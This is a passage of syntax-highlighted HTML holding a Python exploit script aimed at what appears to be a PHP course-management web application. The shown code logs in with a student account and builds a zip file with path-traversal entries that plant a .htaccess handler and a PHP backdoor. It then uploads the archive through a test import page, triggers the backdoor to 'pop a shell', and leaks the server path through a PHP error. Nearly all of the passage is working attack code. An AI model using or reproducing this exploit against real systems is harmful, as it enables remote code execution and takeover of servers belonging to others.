class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) found the token&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) logging in as %s&#8230;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">username<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-116\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;form_password_hidden&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_get_hashed_password<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;form_login&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;submit&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;Login&#8217;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/login.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">allow_redirects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">302<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;index.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;Location&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) failed to login, check your student password&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) failed to get the token&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-126\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_build_zip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-128\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;builds the zip file.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-129\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;we upload a .htaccess incase the webserver doesnt have <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-130\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;a handler for phtml extensions but typically, they do.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-131\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">StringIO<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zipfile<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ZipFile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;w&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zipfile<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ZIP_DEFLATED<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writestr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/.htaccess&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;AddType application\/x-httpd-php .phtml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writestr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/si.phtml&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_build_php_code<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;wb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getvalue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-140\"><span class=\"crayon-e\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-141\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_upload_a_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-143\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;uploads a zip file with php code inside to our target for exploitation<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-144\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_build_zip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">multiple_files<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;file&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;rb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/zip&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;submit_import&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Install&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-149\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;_course_id&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;2&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-151\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;http&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;http:\/\/127.0.0.1:8080&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-152\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/tests\/import_test.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">files<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">multiple_files<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">allow_redirects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-153\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-154\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">302<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-155\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-156\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-157\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-158\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_clean_up<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-159\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">remove<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;pwn.zip&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-160\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-161\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">pop_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-162\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-163\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;pops a shell by making a request to the backdoor code<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-164\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_clean_up<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/home\/si.phtml&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-168\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-170\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-171\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_get_fp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-172\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-173\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;gets the full path<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-174\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;requires some php.ini settings:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-175\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;display_errors = On<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-176\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-177\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">fp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/documentation\/index.php?p[]=&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;array given in &lt;b&gt;\/(.*)documentation\/index.php&lt;\/b&gt; &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/%s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-182\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 